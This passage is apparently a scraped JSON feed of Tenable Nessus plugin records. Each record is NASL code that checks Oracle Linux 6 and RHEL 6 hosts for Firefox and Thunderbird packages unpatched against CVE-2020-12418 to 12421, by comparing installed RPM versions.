Mozilla: Use-after-free in nsGlobalWindowInner\n (CVE-2020-12419)\n\n - Mozilla: Use-After-Free when trying to connect to a STUN\n server (CVE-2020-12420)\n\n - Mozilla: Add-On updates did not respect the same\n certificate trust rules as software updates\n (CVE-2020-12421)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 3, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-07-20T00:00:00", "title": "Oracle Linux 6 : thunderbird (ELSA-2020-2966)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "modified": "2020-07-20T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:thunderbird"], "id": "ORACLELINUX_ELSA-2020-2966.NASL", "href": "https://www.tenable.com/plugins/nessus/138662", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2966 and \n# Oracle Linux Security Advisory ELSA-2020-2966 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138662);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/22\");\n\n script_cve_id(\"CVE-2020-12418\", \"CVE-2020-12419\", \"CVE-2020-12420\", \"CVE-2020-12421\");\n script_xref(name:\"RHSA\", value:\"2020:2966\");\n\n script_name(english:\"Oracle Linux 6 : thunderbird (ELSA-2020-2966)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"From Red Hat Security Advisory 2020:2966 :\n\nThe remote Redhat Enterprise Linux 6 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:2966 advisory.\n\n - Mozilla: Information disclosure due to manipulated URL\n object (CVE-2020-12418)\n\n - Mozilla: Use-after-free in nsGlobalWindowInner\n (CVE-2020-12419)\n\n - Mozilla: Use-After-Free when trying to connect to a STUN\n server (CVE-2020-12420)\n\n - Mozilla: Add-On updates did not respect the same\n certificate trust rules as software updates\n (CVE-2020-12421)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2020-July/010132.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"thunderbird-68.10.0-1.0.1.el6_10\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T17:30:50", "description": "From Red Hat Security Advisory 2020:2824 :\n\nThe remote Redhat Enterprise Linux 6 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:2824 advisory.\n\n - Mozilla: Information disclosure due to manipulated URL\n object (CVE-2020-12418)\n\n - Mozilla: Use-after-free in nsGlobalWindowInner\n (CVE-2020-12419)\n\n - Mozilla: Use-After-Free when trying to connect to a STUN\n server (CVE-2020-12420)\n\n - Mozilla: Add-On updates did not respect the same\n certificate trust rules as software updates\n (CVE-2020-12421)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 6, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-07-08T00:00:00", "title": "Oracle Linux 6 : firefox (ELSA-2020-2824)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "modified": "2020-07-08T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:firefox"], "id": "ORACLELINUX_ELSA-2020-2824.NASL", "href": "https://www.tenable.com/plugins/nessus/138203", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2824 and \n# Oracle Linux Security Advisory ELSA-2020-2824 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138203);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/31\");\n\n script_cve_id(\n \"CVE-2020-12418\",\n \"CVE-2020-12419\",\n \"CVE-2020-12420\",\n \"CVE-2020-12421\"\n );\n script_xref(name:\"RHSA\", value:\"2020:2824\");\n script_xref(name:\"IAVA\", value:\"2020-A-0287-S\");\n\n script_name(english:\"Oracle Linux 6 : firefox (ELSA-2020-2824)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"From Red Hat Security Advisory 2020:2824 :\n\nThe remote Redhat Enterprise Linux 6 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:2824 advisory.\n\n - Mozilla: Information disclosure due to manipulated URL\n object (CVE-2020-12418)\n\n - Mozilla: Use-after-free in nsGlobalWindowInner\n (CVE-2020-12419)\n\n - Mozilla: Use-After-Free when trying to connect to a STUN\n server (CVE-2020-12420)\n\n - Mozilla: Add-On updates did not respect the same\n certificate trust rules as software updates\n (CVE-2020-12421)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2020-July/010104.html\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected firefox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-12420\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"firefox-68.10.0-1.0.1.el6_10\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-29T05:35:56", "description": "The remote Redhat Enterprise Linux 6 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2020:2824 advisory.\n\n - Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n - Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n - Mozilla: Use-After-Free when trying to connect to a STUN server (CVE-2020-12420)\n\n - Mozilla: Add-On updates did not respect the same certificate trust rules as software updates (CVE-2020-12421)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "edition": 7, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-07-07T00:00:00", "title": "RHEL 6 : firefox (RHSA-2020:2824)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "modified": "2020-07-07T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:firefox", "cpe:/o:redhat:enterprise_linux:6::client", "cpe:/o:redhat:enterprise_linux:6::workstation", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6::computenode", "cpe:/o:redhat:enterprise_linux:6::server"], "id": "REDHAT-RHSA-2020-2824.NASL", "href": "https://www.tenable.com/plugins/nessus/138145", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2824. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138145);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/27\");\n\n script_cve_id(\n \"CVE-2020-12418\",\n \"CVE-2020-12419\",\n \"CVE-2020-12420\",\n \"CVE-2020-12421\"\n );\n script_xref(name:\"RHSA\", value:\"2020:2824\");\n\n script_name(english:\"RHEL 6 : firefox (RHSA-2020:2824)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 6 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2020:2824 advisory.\n\n - Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n - Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n - Mozilla: Use-After-Free when trying to connect to a STUN server (CVE-2020-12420)\n\n - Mozilla: Add-On updates did not respect the same certificate trust rules as software updates (CVE-2020-12421)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/200.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/296.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/416.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-12418\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-12419\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-12420\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-12421\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:2824\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1853015\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1853016\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1853017\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1853018\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected firefox package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-12420\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(200, 296, 416);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6::client\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6::computenode\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6::server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6::workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Red Hat 6.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'enterprise_linux_6_client': [\n 'rhel-6-desktop-debug-rpms',\n 'rhel-6-desktop-fastrack-debug-rpms',\n 'rhel-6-desktop-fastrack-rpms',\n 'rhel-6-desktop-fastrack-source-rpms',\n 'rhel-6-desktop-optional-debug-rpms',\n 'rhel-6-desktop-optional-fastrack-debug-rpms',\n 'rhel-6-desktop-optional-fastrack-rpms',\n 'rhel-6-desktop-optional-fastrack-source-rpms',\n 'rhel-6-desktop-optional-rpms',\n 'rhel-6-desktop-optional-source-rpms',\n 'rhel-6-desktop-rpms',\n 'rhel-6-desktop-source-rpms'\n ],\n 'enterprise_linux_6_computenode': [\n 'rhel-6-for-hpc-node-fastrack-debug-rpms',\n 'rhel-6-for-hpc-node-fastrack-rpms',\n 'rhel-6-for-hpc-node-fastrack-source-rpms',\n 'rhel-6-for-hpc-node-optional-fastrack-debug-rpms',\n 'rhel-6-for-hpc-node-optional-fastrack-rpms',\n 'rhel-6-for-hpc-node-optional-fastrack-source-rpms',\n 'rhel-6-hpc-node-debug-rpms',\n 'rhel-6-hpc-node-optional-debug-rpms',\n 'rhel-6-hpc-node-optional-rpms',\n 'rhel-6-hpc-node-optional-source-rpms',\n 'rhel-6-hpc-node-rpms',\n 'rhel-6-hpc-node-source-rpms',\n 'rhel-hpc-node-6-eus-sfs-debug-rpms',\n 'rhel-hpc-node-6-eus-sfs-source-rpms',\n 'rhel-scalefs-for-rhel-6-hpc-node-debug-rpms',\n 'rhel-scalefs-for-rhel-6-hpc-node-rpms',\n 'rhel-scalefs-for-rhel-6-hpc-node-source-rpms'\n ],\n 'enterprise_linux_6_server': [\n 'rhel-6-for-system-z-debug-rpms',\n 'rhel-6-for-system-z-fastrack-debug-rpms',\n 'rhel-6-for-system-z-fastrack-rpms',\n 'rhel-6-for-system-z-fastrack-source-rpms',\n 'rhel-6-for-system-z-optional-debug-rpms',\n 'rhel-6-for-system-z-optional-fastrack-debug-rpms',\n 'rhel-6-for-system-z-optional-fastrack-rpms',\n 'rhel-6-for-system-z-optional-fastrack-source-rpms',\n 'rhel-6-for-system-z-optional-rpms',\n 'rhel-6-for-system-z-optional-source-rpms',\n 'rhel-6-for-system-z-rpms',\n 'rhel-6-for-system-z-source-rpms',\n 'rhel-6-server-debug-rpms',\n 'rhel-6-server-fastrack-debug-rpms',\n 'rhel-6-server-fastrack-rpms',\n 'rhel-6-server-fastrack-source-rpms',\n 'rhel-6-server-optional-debug-rpms',\n 'rhel-6-server-optional-fastrack-debug-rpms',\n 'rhel-6-server-optional-fastrack-rpms',\n 'rhel-6-server-optional-fastrack-source-rpms',\n 'rhel-6-server-optional-rpms',\n 'rhel-6-server-optional-source-rpms',\n 'rhel-6-server-rpms',\n 'rhel-6-server-source-rpms',\n 'rhel-ha-for-rhel-6-server-debug-rpms',\n 'rhel-ha-for-rhel-6-server-rpms',\n 'rhel-ha-for-rhel-6-server-source-rpms',\n 'rhel-lb-for-rhel-6-server-debug-rpms',\n 'rhel-lb-for-rhel-6-server-rpms',\n 'rhel-lb-for-rhel-6-server-source-rpms',\n 'rhel-rs-for-rhel-6-server-debug-rpms',\n 'rhel-rs-for-rhel-6-server-rpms',\n 'rhel-rs-for-rhel-6-server-source-rpms',\n 'rhel-scalefs-for-rhel-6-server-debug-rpms',\n 'rhel-scalefs-for-rhel-6-server-rpms',\n 'rhel-scalefs-for-rhel-6-server-source-rpms'\n ],\n 'enterprise_linux_6_workstation': [\n 'rhel-6-workstation-debug-rpms',\n 'rhel-6-workstation-fastrack-debug-rpms',\n 'rhel-6-workstation-fastrack-rpms',\n 'rhel-6-workstation-fastrack-source-rpms',\n 'rhel-6-workstation-optional-debug-rpms',\n 'rhel-6-workstation-optional-fastrack-debug-rpms',\n 'rhel-6-workstation-optional-fastrack-rpms',\n 'rhel-6-workstation-optional-fastrack-source-rpms',\n 'rhel-6-workstation-optional-rpms',\n 'rhel-6-workstation-optional-source-rpms',\n 'rhel-6-workstation-rpms',\n 'rhel-6-workstation-source-rpms',\n 'rhel-scalefs-for-rhel-6-workstation-debug-rpms',\n 'rhel-scalefs-for-rhel-6-workstation-rpms',\n 'rhel-scalefs-for-rhel-6-workstation-source-rpms'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2020:2824');\n}\n\npkgs = [\n {'reference':'firefox-68.10.0-1.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'firefox-68.10.0-1.el6_10', 'cpu':'s390x', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'firefox-68.10.0-1.el6_10', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'firefox');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-21T06:02:24", "description": "The remote Redhat Enterprise Linux 6 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2020:2966 advisory.\n\n - Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n - Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n - Mozilla: Use-After-Free when trying to connect to a STUN server (CVE-2020-12420)\n\n - Mozilla: Add-On updates did not respect the same certificate trust rules as software updates (CVE-2020-12421)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "edition": 4, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-07-16T00:00:00", "title": "RHEL 6 : thunderbird (RHSA-2020:2966)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-15646", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "modified": "2020-07-16T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:thunderbird", "cpe:/o:redhat:enterprise_linux:6::client", "cpe:/o:redhat:enterprise_linux:6::workstation", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6::server"], "id": "REDHAT-RHSA-2020-2966.NASL", "href": "https://www.tenable.com/plugins/nessus/138559", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2966. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138559);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/19\");\n\n script_cve_id(\n \"CVE-2020-12418\",\n \"CVE-2020-12419\",\n \"CVE-2020-12420\",\n \"CVE-2020-12421\"\n );\n script_xref(name:\"RHSA\", value:\"2020:2966\");\n\n script_name(english:\"RHEL 6 : thunderbird (RHSA-2020:2966)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 6 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2020:2966 advisory.\n\n - Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n - Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n - Mozilla: Use-After-Free when trying to connect to a STUN server 